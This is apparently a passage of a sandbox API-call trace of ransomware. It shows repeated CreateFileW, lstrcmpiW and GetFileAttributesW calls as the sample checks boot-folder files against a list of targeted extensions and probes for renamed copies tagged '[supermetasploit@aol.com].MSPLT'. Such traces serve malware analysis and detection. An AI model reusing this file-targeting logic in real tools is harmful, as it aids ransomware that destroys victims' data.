(lpFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.491] CreateFileW (lpFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.491] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.491] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.492] lstrlenW (lpString=".doc") returned 4 [0286.492] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.492] lstrlenW (lpString=".docx") returned 5 [0286.492] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.492] lstrlenW (lpString=".pdf") returned 4 [0286.492] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.492] lstrlenW (lpString=".xls") returned 4 [0286.492] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.492] lstrlenW (lpString=".xlsx") returned 5 [0286.492] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.492] lstrlenW (lpString=".ppt") returned 4 [0286.492] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.492] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.492] lstrlenW (lpString=".zip") returned 4 [0286.492] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.492] lstrlenW (lpString=".rar") returned 4 [0286.492] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.492] lstrlenW (lpString=".bz2") returned 4 [0286.492] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.492] lstrlenW (lpString=".7z") returned 3 [0286.492] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.492] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.492] lstrlenW (lpString=".dbf") returned 4 [0286.492] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.492] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.492] lstrlenW (lpString=".1cd") returned 4 [0286.492] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.492] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.492] lstrlenW (lpString=".jpg") returned 4 [0286.492] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.492] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.492] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.492] lstrlenW (lpString=".doc") returned 4 [0286.493] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.493] lstrlenW (lpString=".docx") returned 5 [0286.493] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.493] lstrlenW (lpString=".pdf") returned 4 [0286.493] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.493] lstrlenW (lpString=".xls") returned 4 [0286.493] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.493] lstrlenW (lpString=".xlsx") returned 5 [0286.493] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.493] lstrlenW (lpString=".ppt") returned 4 [0286.493] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.493] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.493] lstrlenW (lpString=".zip") returned 4 [0286.493] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.493] lstrlenW (lpString=".rar") returned 4 [0286.493] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.493] lstrlenW (lpString=".bz2") returned 4 [0286.493] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.493] lstrlenW (lpString=".7z") returned 3 [0286.493] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.493] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.493] lstrlenW (lpString=".dbf") returned 4 [0286.493] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.493] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.493] lstrlenW (lpString=".1cd") returned 4 [0286.493] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.493] lstrlenW (lpString="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 29 [0286.493] lstrlenW (lpString=".jpg") returned 4 [0286.493] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.494] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.494] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.494] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.494] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=77152) returned 1 [0286.494] CloseHandle (hObject=0x348) returned 1 [0286.494] GetFileAttributesW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui")) returned 0x20 [0286.494] GetFileAttributesW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.494] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.495] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.495] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.495] lstrlenW (lpString=".doc") returned 4 [0286.495] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.495] lstrlenW (lpString=".docx") returned 5 [0286.495] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.495] lstrlenW (lpString=".pdf") returned 4 [0286.495] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.495] lstrlenW (lpString=".xls") returned 4 [0286.495] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.495] lstrlenW (lpString=".xlsx") returned 5 [0286.495] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.495] lstrlenW (lpString=".ppt") returned 4 [0286.495] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.495] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.495] lstrlenW (lpString=".zip") returned 4 [0286.495] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.495] lstrlenW (lpString=".rar") returned 4 [0286.495] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.495] lstrlenW (lpString=".bz2") returned 4 [0286.495] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.495] lstrlenW (lpString=".7z") returned 3 [0286.495] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.495] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.495] lstrlenW (lpString=".dbf") returned 4 [0286.496] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.496] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.496] lstrlenW (lpString=".1cd") returned 4 [0286.496] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.496] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.496] lstrlenW (lpString=".jpg") returned 4 [0286.496] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.496] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.496] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.496] lstrlenW (lpString=".doc") returned 4 [0286.496] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.496] lstrlenW (lpString=".docx") returned 5 [0286.496] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.496] lstrlenW (lpString=".pdf") returned 4 [0286.496] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.496] lstrlenW (lpString=".xls") returned 4 [0286.496] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.496] lstrlenW (lpString=".xlsx") returned 5 [0286.496] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.496] lstrlenW (lpString=".ppt") returned 4 [0286.496] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.496] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.496] lstrlenW (lpString=".zip") returned 4 [0286.496] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.496] lstrlenW (lpString=".rar") returned 4 [0286.496] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.496] lstrlenW (lpString=".bz2") returned 4 [0286.496] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.496] lstrlenW (lpString=".7z") returned 3 [0286.497] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.497] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.497] lstrlenW (lpString=".dbf") returned 4 [0286.497] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.497] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.497] lstrlenW (lpString=".1cd") returned 4 [0286.497] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.497] lstrlenW (lpString="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 29 [0286.497] lstrlenW (lpString=".jpg") returned 4 [0286.497] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.497] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.497] lstrlenW (lpString="memtest.exe.mui") returned 15 [0286.497] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.497] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=44960) returned 1 [0286.497] CloseHandle (hObject=0x348) returned 1 [0286.497] GetFileAttributesW (lpFileName="C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui")) returned 0x20 [0286.498] GetFileAttributesW (lpFileName="C:\\Boot\\ru-RU\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.498] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.498] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.498] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.498] lstrlenW (lpString=".doc") returned 4 [0286.498] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.498] lstrlenW (lpString=".docx") returned 5 [0286.498] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.498] lstrlenW (lpString=".pdf") returned 4 [0286.498] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.498] lstrlenW (lpString=".xls") returned 4 [0286.498] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.498] lstrlenW (lpString=".xlsx") returned 5 [0286.498] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.498] lstrlenW (lpString=".ppt") returned 4 [0286.498] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.498] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.498] lstrlenW (lpString=".zip") returned 4 [0286.498] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.498] lstrlenW (lpString=".rar") returned 4 [0286.498] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.498] lstrlenW (lpString=".bz2") returned 4 [0286.498] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.498] lstrlenW (lpString=".7z") returned 3 [0286.499] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.499] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.499] lstrlenW (lpString=".dbf") returned 4 [0286.499] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.499] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.499] lstrlenW (lpString=".1cd") returned 4 [0286.499] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.499] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.499] lstrlenW (lpString=".jpg") returned 4 [0286.499] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.499] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.499] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.499] lstrlenW (lpString=".doc") returned 4 [0286.499] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.499] lstrlenW (lpString=".docx") returned 5 [0286.499] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.499] lstrlenW (lpString=".pdf") returned 4 [0286.499] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.499] lstrlenW (lpString=".xls") returned 4 [0286.499] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.499] lstrlenW (lpString=".xlsx") returned 5 [0286.499] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.499] lstrlenW (lpString=".ppt") returned 4 [0286.499] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.499] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.499] lstrlenW (lpString=".zip") returned 4 [0286.499] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.500] lstrlenW (lpString=".rar") returned 4 [0286.500] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.500] lstrlenW (lpString=".bz2") returned 4 [0286.500] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.500] lstrlenW (lpString=".7z") returned 3 [0286.500] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.500] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.500] lstrlenW (lpString=".dbf") returned 4 [0286.500] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.500] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.500] lstrlenW (lpString=".1cd") returned 4 [0286.500] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.500] lstrlenW (lpString="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 29 [0286.500] lstrlenW (lpString=".jpg") returned 4 [0286.500] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.500] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.500] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.501] CreateFileW (lpFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.501] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=77144) returned 1 [0286.501] CloseHandle (hObject=0x348) returned 1 [0286.501] GetFileAttributesW (lpFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui")) returned 0x20 [0286.501] GetFileAttributesW (lpFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.501] CreateFileW (lpFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.502] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.502] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.502] lstrlenW (lpString=".doc") returned 4 [0286.502] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.502] lstrlenW (lpString=".docx") returned 5 [0286.502] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.502] lstrlenW (lpString=".pdf") returned 4 [0286.502] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.502] lstrlenW (lpString=".xls") returned 4 [0286.502] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.502] lstrlenW (lpString=".xlsx") returned 5 [0286.502] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.502] lstrlenW (lpString=".ppt") returned 4 [0286.502] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.502] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.502] lstrlenW (lpString=".zip") returned 4 [0286.502] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.502] lstrlenW (lpString=".rar") returned 4 [0286.502] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.502] lstrlenW (lpString=".bz2") returned 4 [0286.503] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.503] lstrlenW (lpString=".7z") returned 3 [0286.503] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.503] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.503] lstrlenW (lpString=".dbf") returned 4 [0286.503] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.503] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.503] lstrlenW (lpString=".1cd") returned 4 [0286.503] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.503] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.503] lstrlenW (lpString=".jpg") returned 4 [0286.503] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.503] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.503] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.503] lstrlenW (lpString=".doc") returned 4 [0286.503] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.503] lstrlenW (lpString=".docx") returned 5 [0286.503] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.503] lstrlenW (lpString=".pdf") returned 4 [0286.503] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.503] lstrlenW (lpString=".xls") returned 4 [0286.503] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.503] lstrlenW (lpString=".xlsx") returned 5 [0286.503] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.503] lstrlenW (lpString=".ppt") returned 4 [0286.503] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.503] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.503] lstrlenW (lpString=".zip") returned 4 [0286.504] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.504] lstrlenW (lpString=".rar") returned 4 [0286.504] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.504] lstrlenW (lpString=".bz2") returned 4 [0286.504] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.504] lstrlenW (lpString=".7z") returned 3 [0286.504] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.504] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.504] lstrlenW (lpString=".dbf") returned 4 [0286.504] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.504] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.504] lstrlenW (lpString=".1cd") returned 4 [0286.504] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.504] lstrlenW (lpString="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 29 [0286.504] lstrlenW (lpString=".jpg") returned 4 [0286.504] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.504] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.504] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.504] CreateFileW (lpFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.504] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=76640) returned 1 [0286.505] CloseHandle (hObject=0x348) returned 1 [0286.505] GetFileAttributesW (lpFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui")) returned 0x20 [0286.505] GetFileAttributesW (lpFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.505] CreateFileW (lpFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.505] lstrlenW (lpString="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 29 [0286.505] lstrlenW (lpString="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 29 [0286.505] lstrlenW (lpString=".doc") returned 4 [0286.505] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.505] lstrlenW (lpString=".docx") returned 5 [0286.505] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.505] lstrlenW (lpString=".pdf") returned 4 [0286.505] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.505] lstrlenW (lpString=".xls") returned 4 [0286.505] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.505] lstrlenW (lpString=".xlsx") returned 5 [0286.505] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.505] lstrlenW (lpString=".ppt") returned 4 [0286.505] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.505] lstrlenW (lpString="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 29 [0286.505] lstrlenW (lpString=".zip") returned 4 [0286.506] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.506] lstrlenW (lpString=".rar") returned 4 [0286.506] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.506] lstrlenW (lpString=".bz2") returned 4 [0286.506] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.506] lstrlenW (lpString=".7z") returned 3 [0286.506] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.506] lstrlenW (lpString="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 29 [0286.506] lstrlenW (lpString=".dbf") returned 4 [0286.506] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.506] lstrlenW (lpString="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 29 [0286.506] lstrlenW (lpString=".1cd") returned 4 [0286.506] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.506] lstrlenW (lpString="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 29 [0286.506] lstrlenW (lpString=".jpg") returned 4 [0286.506] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.506] lstrlenW (lpString="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 29 [0286.506] lstrlenW (lpString="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 29 [0286.506] lstrlenW (lpString=".doc") returned 4 [0286.506] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.506] lstrlenW (lpString=".docx") returned 5 [0286.506] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.506] lstrlenW (lpString=".pdf") returned 4 [0286.507] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.507] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=77152) returned 1 [0286.507] CloseHandle (hObject=0x348) returned 1 [0286.507] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui")) returned 0x20 [0286.507] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.507] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.507] lstrlenW (lpString="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 34 [0286.507] lstrlenW (lpString="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 34 [0286.507] lstrlenW (lpString=".doc") returned 4 [0286.508] lstrlenW (lpString="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 34 [0286.508] lstrlenW (lpString="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 34 [0286.508] lstrlenW (lpString=".doc") returned 4 [0286.508] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 